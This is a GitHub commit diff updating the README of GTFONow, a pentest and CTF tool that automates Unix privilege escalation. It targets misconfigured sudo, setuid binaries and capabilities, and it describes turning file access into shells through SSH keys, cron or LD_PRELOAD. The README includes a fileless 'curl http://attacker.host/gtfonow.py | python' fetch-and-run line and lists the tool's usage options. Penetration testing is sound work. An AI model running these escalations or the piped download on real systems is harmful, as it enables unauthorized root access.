-
Notifications
You must be signed in to change notification settings - Fork 67
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #17 from Frissi0n/dev
docs: Update README
- Loading branch information
Showing
2 changed files
with
32 additions
and
72 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,102 +1,62 @@ | ||
# GTFONow | ||
[![Main Branch](https://github.com/Frissi0n/GTFONow/actions/workflows/docker-pytest.yml/badge.svg?branch=main)](https://github.com/Frissi0n/GTFONow/actions/workflows/docker-pytest.yml) | ||
|
||
Automatic privilege escalation for misconfigured capabilities, sudo config and setuid/setguid binaries. | ||
# GTFONow | ||
|
||
## Features | ||
Automatic privilege escalation on unix systems by exploiting misconfigured setuid/setgid binaries, capabilities and sudo permissions. Designed for CTFs but also applicable in real world pentests. | ||
|
||
| Feature | Implemented | | ||
| -------------------------------------------------------------------------------------- | ------------------ | | ||
| Automatically exploit misconfigured sudo permissions. | :heavy_check_mark: | | ||
| Automatically exploit misconfigured suid, sgid permissions. | :heavy_check_mark: | | ||
| Automatically exploit misconfigured capabilities. | :heavy_check_mark: | | ||
| Automatically convert arbitrary file read primitive into shell by stealing SSH keys. | :heavy_check_mark: | | ||
| Automatically convert arbitrary file write primitive into shell by dropping SSH keys. | :heavy_check_mark: | | ||
| Automatically convert arbitrary file write primitive into shell by writing to cron. | :heavy_check_mark: | | ||
| Automatically convert arbitrary file write primitive into shell using LD_PRELOAD. | :heavy_check_mark: | | ||
| Single file, easy to run fileless with `curl http://attackerhost/gtfonow.py \| python` | :heavy_check_mark: | | ||
| Interactionless mode. For environments where stdin is not controllable. | Todo | | ||
[![asciicast](https://asciinema.org/a/625026.svg)](https://asciinema.org/a/625026) | ||
|
||
## Compatibility | ||
## ✅ Features | ||
|
||
By design GTFONow is a backwards compatible, stdlib only python script, meaning it should work on any variant of Unix if Python is installed. | ||
- Automatically exploit misconfigured sudo permissions. | ||
- Automatically exploit misconfigured suid, sgid permissions. | ||
- Automatically exploit misconfigured capabilities. | ||
- Automatically convert arbitrary file read primitive into shell by stealing SSH keys. | ||
- Automatically convert arbitrary file write primitive into shell by dropping SSH keys. | ||
- Automatically convert arbitrary file write primitive into shell by writing to cron. | ||
- Automatically convert arbitrary file write primitive into shell using LD_PRELOAD. | ||
- Single file, easy to run fileless with `curl http://attackerhost/gtfonow.py | python` | ||
|
||
| Platform | Supports | | ||
| -------------------------------------- | ------------------ | | ||
| Python2.\* | :heavy_check_mark: | | ||
| Python3.\* | :heavy_check_mark: | | ||
| No 3rd party dependencies | :heavy_check_mark: | | ||
| Any Unix Variant (Linux, MacOS,\*Nix) | :heavy_check_mark: | | ||
| Any architecture eg (X86/ARM64/X86-64) | :heavy_check_mark: | | ||
| Systems without Python installed | Todo | | ||
|
||
## Usage | ||
# 💻 Usage | ||
|
||
To use `GTFONow`, simply run the script from your command line. The basic syntax is as follows: | ||
|
||
```bash | ||
python gtfo_now.py [OPTIONS] | ||
```shell | ||
python gtfonow.py [OPTIONS] | ||
``` | ||
|
||
It can also be run by piping the out put of curl: | ||
It can also be run by piping the output of curl: | ||
|
||
```bash | ||
```shell | ||
curl http://attacker.host/gtfonow.py | python | ||
``` | ||
|
||
### Options | ||
|
||
Here are the options you can use with `GTFONow`: | ||
## Options | ||
|
||
- `--level`: Sets the level of checks to perform. You can choose between: | ||
|
||
- `1` (default) for a quick scan. | ||
- `2` for a more thorough scan. | ||
- Example: `python gtfonow.py --level 2` | ||
|
||
- `--risk`: Specifies the risk level of the exploit to perform. The options are: | ||
|
||
- `1` (default) for safe operations. | ||
- `2` for more aggressive operations, primarily for use in CTFs, if using on real engagements, ensure you understand what this is doing. | ||
- `2` for more aggressive operations such as file modifications, primarily for use in CTFs, if using on real engagements, ensure you understand what this is doing. | ||
- Example: `python gtfonow.py --risk 2` | ||
|
||
- `--sudo_password`: Enables sudo_password mode, offering more privilege escalation options if you know the sudo password. | ||
|
||
- This option does not require a value. You will be prompted to enter the sudo password via stdin. | ||
- Example: `python gtfonow.py --sudo_password` | ||
|
||
- `--command`: Issues a single command instead of spawning an interactive shell. This is mainly for debugging purposes. | ||
|
||
- Example: `python gtfonow.py --command 'ls -la'` | ||
|
||
- `--auto`: Automatically exploits without user wizard. | ||
- `-v`, `--verbose`: Enables verbose output. | ||
- Example: `python gtfonow.py --verbose` | ||
|
||
### Examples | ||
|
||
Here are some example commands to get you started: | ||
|
||
1. Perform a quick scan: | ||
|
||
python gtfonow.py | ||
|
||
2. Perform a thorough scan with a higher risk level: | ||
|
||
python gtfonow.py --level 2 --risk 2 | ||
|
||
## Usage Examples | ||
|
||
### Default Mode - Scan All | ||
|
||
[![asciicast](https://asciinema.org/a/CyEH3GyAFyWtIVjngWpa0hDBk.svg)](https://asciinema.org/a/CyEH3GyAFyWtIVjngWpa0hDBk) | ||
|
||
### Capability Escalation | ||
|
||
[![asciicast](https://asciinema.org/a/nmrMirrKNRrb7XHhVRYD66tWa.svg)](https://asciinema.org/a/nmrMirrKNRrb7XHhVRYD66tWa) | ||
## Compatibility | ||
|
||
### Sudo Escalation and Verbose Mode | ||
By design GTFONow is a backwards compatible, stdlib only python script, meaning it should work on any variant of Unix if Python is installed. | ||
|
||
[![asciicast](https://asciinema.org/a/HdpWGxGAIAMahoJD6eoB6pqNq.svg)](https://asciinema.org/a/HdpWGxGAIAMahoJD6eoB6pqNq) | ||
- Python2.\* | ||
- Python3.\* | ||
- No 3rd party dependencies | ||
- Any Unix Variant (Linux, MacOS,\*Nix) | ||
- Any architecture eg (X86/ARM64/X86-64) | ||
|
||
## Credits | ||
## 🙏 Credits | ||
|
||
- Payloads thanks to [GTFOBins](https://gtfobins.github.io/). |